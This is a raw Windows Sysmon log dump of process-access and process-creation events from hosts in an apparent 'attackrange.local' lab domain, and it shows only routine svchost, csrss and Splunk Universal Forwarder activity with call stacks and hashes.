22:14:32.693{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033069Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:32.693{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033068Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:32.693{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033067Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:32.693{FF16AF91-26B4-6013-0500-00000000A401}6441200C:\Windows\system32\csrss.exe{FF16AF91-3748-6013-8B03-00000000A401}5952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000033066Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:32.693{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-3748-6013-8B03-00000000A401}5952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000033065Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:32.694{FF16AF91-3748-6013-8B03-00000000A401}5952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362570Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:32.487{8e433fbf-3748-6013-c603-000000001100}76281380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362569Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:32.331{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-3748-6013-c603-000000001100}7628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362568Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:32.331{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362567Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:32.331{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362566Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:32.331{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362565Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:32.331{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362564Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:32.331{8e433fbf-2a44-6013-0600-000000001100}756772C:\Windows\system32\csrss.exe{8e433fbf-3748-6013-c603-000000001100}7628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362563Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:32.331{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-3748-6013-c603-000000001100}7628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362562Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:32.332{8e433fbf-3748-6013-c603-000000001100}7628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000033064Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:32.162{FF16AF91-3748-6013-8A03-00000000A401}19244684C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033063Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:32.022{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-3748-6013-8A03-00000000A401}1924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033062Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:32.022{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033061Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:32.022{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033060Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:32.022{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033059Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:32.022{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033058Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:32.022{FF16AF91-26B4-6013-0500-00000000A401}6441200C:\Windows\system32\csrss.exe{FF16AF91-3748-6013-8A03-00000000A401}1924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000033057Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:32.022{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-3748-6013-8A03-00000000A401}1924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000033056Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:32.022{FF16AF91-3748-6013-8A03-00000000A401}1924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362579Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:33.175{8e433fbf-3749-6013-c703-000000001100}112408544C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362578Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:33.003{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-3749-6013-c703-000000001100}11240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362577Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:33.003{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362576Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:33.003{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362575Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 